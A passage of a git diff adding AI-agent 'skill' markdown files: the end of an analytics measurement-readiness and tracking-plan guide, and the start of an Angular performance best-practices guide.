+This index answers:
+
+> **Can this analytics setup produce reliable, decision-grade insights?**
+
+It prevents:
+
+* event sprawl
+* vanity tracking
+* misleading conversion data
+* false confidence in broken analytics
+
+---
+
+## 🔢 Measurement Readiness & Signal Quality Index
+
+### Total Score: **0–100**
+
+This is a **diagnostic score**, not a performance KPI.
+
+---
+
+### Scoring Categories & Weights
+
+| Category | Weight |
+| ----------------------------- | ------- |
+| Decision Alignment | 25 |
+| Event Model Clarity | 20 |
+| Data Accuracy & Integrity | 20 |
+| Conversion Definition Quality | 15 |
+| Attribution & Context | 10 |
+| Governance & Maintenance | 10 |
+| **Total** | **100** |
+
+---
+
+### Category Definitions
+
+#### 1. Decision Alignment (0–25)
+
+* Clear business questions defined
+* Each tracked event maps to a decision
+* No events tracked “just in case”
+
+---
+
+#### 2. Event Model Clarity (0–20)
+
+* Events represent **meaningful actions**
+* Naming conventions are consistent
+* Properties carry context, not noise
+
+---
+
+#### 3. Data Accuracy & Integrity (0–20)
+
+* Events fire reliably
+* No duplication or inflation
+* Values are correct and complete
+* Cross-browser and mobile validated
+
+---
+
+#### 4. Conversion Definition Quality (0–15)
+
+* Conversions represent real success
+* Conversion counting is intentional
+* Funnel stages are distinguishable
+
+---
+
+#### 5. Attribution & Context (0–10)
+
+* UTMs are consistent and complete
+* Traffic source context is preserved
+* Cross-domain / cross-device handled appropriately
+
+---
+
+#### 6. Governance & Maintenance (0–10)
+
+* Tracking is documented
+* Ownership is clear
+* Changes are versioned and monitored
+
+---
+
+### Readiness Bands (Required)
+
+| Score | Verdict | Interpretation |
+| ------ | --------------------- | --------------------------------- |
+| 85–100 | **Measurement-Ready** | Safe to optimize and experiment |
+| 70–84 | **Usable with Gaps** | Fix issues before major decisions |
+| 55–69 | **Unreliable** | Data cannot be trusted yet |
+| <55 | **Broken** | Do not act on this data |
+
+If verdict is **Broken**, stop and recommend remediation first.
+
+---
+
+## Phase 1: Context & Decision Definition
+
+(Proceed only after scoring)
+
+### 1. Business Context
+
+* What decisions will this data inform?
+* Who uses the data (marketing, product, leadership)?
+* What actions will be taken based on insights?
+
+---
+
+### 2. Current State
+
+* Tools in use (GA4, GTM, Mixpanel, Amplitude, etc.)
+* Existing events and conversions
+* Known issues or distrust in data
+
+---
+
+### 3. Technical & Compliance Context
+
+* Tech stack and rendering model
+* Who implements and maintains tracking
+* Privacy, consent, and regulatory constraints
+
+---
+
+## Core Principles (Non-Negotiable)
+
+### 1. Track for Decisions, Not Curiosity
+
+If no decision depends on it, **don’t track it**.
+
+---
+
+### 2. Start with Questions, Work Backwards
+
+Define:
+
+* What you need to know
+* What action you’ll take
+* What signal proves it
+
+Then design events.
+
+---
+
+### 3. Events Represent Meaningful State Changes
+
+Avoid:
+
+* cosmetic clicks
+* redundant events
+* UI noise
+
+Prefer:
+
+* intent
+* completion
+* commitment
+
+---
+
+### 4. Data Quality Beats Volume
+
+Fewer accurate events > many unreliable ones.
+
+---
+
+## Event Model Design
+
+### Event Taxonomy
+
+**Navigation / Exposure**
+
+* page_view (enhanced)
+* content_viewed
+* pricing_viewed
+
+**Intent Signals**
+
+* cta_clicked
+* form_started
+* demo_requested
+
+**Completion Signals**
+
+* signup_completed
+* purchase_completed
+* subscription_changed
+
+**System / State Changes**
+
+* onboarding_completed
+* feature_activated
+* error_occurred
+
+---
+
+### Event Naming Conventions
+
+**Recommended pattern:**
+
+```
+object_action[_context]
+```
+
+Examples:
+
+* signup_completed
+* pricing_viewed
+* cta_hero_clicked
+* onboarding_step_completed
+
+Rules:
+
+* lowercase
+* underscores
+* no spaces
+* no ambiguity
+
+---
+
+### Event Properties (Context, Not Noise)
+
+Include:
+
+* where (page, section)
+* who (user_type, plan)
+* how (method, variant)
+
+Avoid:
+
+* PII
+* free-text fields
+* duplicated auto-properties
+
+---
+
+## Conversion Strategy
+
+### What Qualifies as a Conversion
+
+A conversion must represent:
+
+* real value
+* completed intent
+* irreversible progress
+
+Examples:
+
+* signup_completed
+* purchase_completed
+* demo_booked
+
+Not conversions:
+
+* page views
+* button clicks
+* form starts
+
+---
+
+### Conversion Counting Rules
+
+* Once per session vs every occurrence
+* Explicitly documented
+* Consistent across tools
+
+---
+
+## GA4 & GTM (Implementation Guidance)
+
+*(Tool-specific, but optional)*
+
+* Prefer GA4 recommended events
+* Use GTM for orchestration, not logic
+* Push clean dataLayer events
+* Avoid multiple containers
+* Version every publish
+
+---
+
+## UTM & Attribution Discipline
+
+### UTM Rules
+
+* lowercase only
+* consistent separators
+* documented centrally
+* never overwritten client-side
+
+UTMs exist to **explain performance**, not inflate numbers.
+
+---
+
+## Validation & Debugging
+
+### Required Validation
+
+* Real-time verification
+* Duplicate detection
+* Cross-browser testing
+* Mobile testing
+* Consent-state testing
+
+### Common Failure Modes
+
+* double firing
+* missing properties
+* broken attribution
+* PII leakage
+* inflated conversions
+
+---
+
+## Privacy & Compliance
+
+* Consent before tracking where required
+* Data minimization
+* User deletion support
+* Retention policies reviewed
+
+Analytics that violate trust undermine optimization.
+
+---
+
+## Output Format (Required)
+
+### Measurement Strategy Summary
+
+* Measurement Readiness Index score + verdict
+* Key risks and gaps
+* Recommended remediation order
+
+---
+
+### Tracking Plan
+
+| Event | Description | Properties | Trigger | Decision Supported |
+| ----- | ----------- | ---------- | ------- | ------------------ |
+
+---
+
+### Conversions
+
+| Conversion | Event | Counting | Used By |
+| ---------- | ----- | -------- | ------- |
+
+---
+
+### Implementation Notes
+
+* Tool-specific setup
+* Ownership
+* Validation steps
+
+---
+
+## Questions to Ask (If Needed)
+
+1. What decisions depend on this data?
+2. Which metrics are currently trusted or distrusted?
+3. Who owns analytics long term?
+4. What compliance constraints apply?
+5. What tools are already in place?
+
+---
+
+## Related Skills
+
+* **page-cro** – Uses this data for optimization
+* **ab-test-setup** – Requires clean conversions
+* **seo-audit** – Organic performance analysis
+* **programmatic-seo** – Scale requires reliable signals
+
+---
diff --git a/web-app/public/skills/angular-best-practices/README.md b/web-app/public/skills/angular-best-practices/README.md
new file mode 100644
index 00000000..143a521f
--- /dev/null
+++ b/web-app/public/skills/angular-best-practices/README.md
@@ -0,0 +1,58 @@
+# Angular Best Practices
+
+Performance optimization and best practices for Angular applications optimized for AI agents and LLMs.
+
+## Overview
+
+This skill provides prioritized performance guidelines across:
+
+- **Change Detection** - OnPush strategy, Signals, Zoneless apps
+- **Async Operations** - Avoiding waterfalls, SSR preloading
+- **Bundle Optimization** - Lazy loading, `@defer`, tree-shaking
+- **Rendering Performance** - TrackBy, virtual scrolling, CDK
+- **SSR & Hydration** - Server-side rendering patterns
+- **Template Optimization** - Structural directives, pipe memoization
+- **State Management** - Efficient reactivity patterns
+- **Memory Management** - Subscription cleanup, detached refs
+
+## Structure
+
+The `SKILL.md` file is organized by priority:
+
+1. **Critical Priority** - Largest performance gains (change detection, async)
+2. **High Priority** - Significant impact (bundles, rendering)
+3. **Medium Priority** - Noticeable improvements (SSR, templates)
+4. **Low Priority** - Incremental gains (memory, cleanup)
+
+Each rule includes:
+
+- ❌ **WRONG** - What not to do
+- ✅ **CORRECT** - Recommended pattern
+- 📝 **Why** - Explanation of the impact
+
+## Quick Reference Checklist
+
+**For New Components:**
+
+- [ ] Using `ChangeDetectionStrategy.OnPush`
+- [ ] Using Signals for reactive state
+- [ ] Using `@defer` for non-critical content
+- [ ] Using `trackBy` for `*ngFor` loops
+- [ ] No subscriptions without cleanup
+
+**For Performance Reviews:**
+
+- [ ] No async waterfalls (parallel data fetching)
+- [ ] Routes lazy-loaded
+- [ ] Large libraries code-split
+- [ ] Images use `NgOptimizedImage`
+
+## Version
+
+Current version: 1.0.0 (February 2026)
+
+## References
+
+- [Angular Performance](https://angular.dev/guide/performance)
+- [Zoneless Angular](https://angular.dev/guide/zoneless)
+- [Angular SSR](https://angular.dev/guide/ssr)
diff --git a/web-app/public/skills/angular-best-practices/SKILL.md b/web-app/public/skills/angular-best-practices/SKILL.md
new file mode 100644
index 00000000..c2920a58
--- /dev/null
+++ b/web-app/public/skills/angular-best-practices/SKILL.md
@@ -0,0 +1,559 @@
+---
+name: angular-best-practices
+description: Angular performance optimization and best practices guide. Use when writing, reviewing, or refactoring Angular code for optimal performance, bundle size, and rendering efficiency.
+risk: safe
+source: self
+---
+
+# Angular Best Practices
+
+Comprehensive performance optimization guide for Angular applications. Contains prioritized rules for eliminating performance bottlenecks, optimizing bundles, and improving rendering.
+
+## When to Apply
+
+Reference these guidelines when:
+
+- Writing new Angular components or pages
+- Implementing data fetching patterns
+- Reviewing code for performance issues
+- Refactoring existing Angular code
+- Optimizing bundle size or load times
+- Configuring SSR/hydration
+
+---
+
+## Rule Categories by Priority
+
+| Priority | Category | Impact | Focus |
+| -------- | --------------------- | ---------- | ------------------------------- |
+| 1 | Change Detection | CRITICAL | Signals, OnPush, Zoneless |
+| 2 | Async Waterfalls | CRITICAL | RxJS patterns, SSR preloading |
+| 3 | Bundle Optimization | CRITICAL | Lazy loading, tree shaking |
+| 4 | Rendering Performance | HIGH | @defer, trackBy, virtualization |
+| 5 | Server-Side Rendering | HIGH | Hydration, prerendering |
+| 6 | Template Optimization | MEDIUM | Control flow, pipes |
+| 7 | State Management | MEDIUM | Signal patterns, selectors |
+| 8 | Memory Management | LOW-MEDIUM | Cleanup, subscriptions |
+
+---
+
+## 1. Change Detection (CRITICAL)
+
+### Use OnPush Change Detection
+
+```typescript
+// CORRECT - OnPush with Signals
+@Component({
+ changeDetection: ChangeDetectionStrategy.OnPush,
+ template: `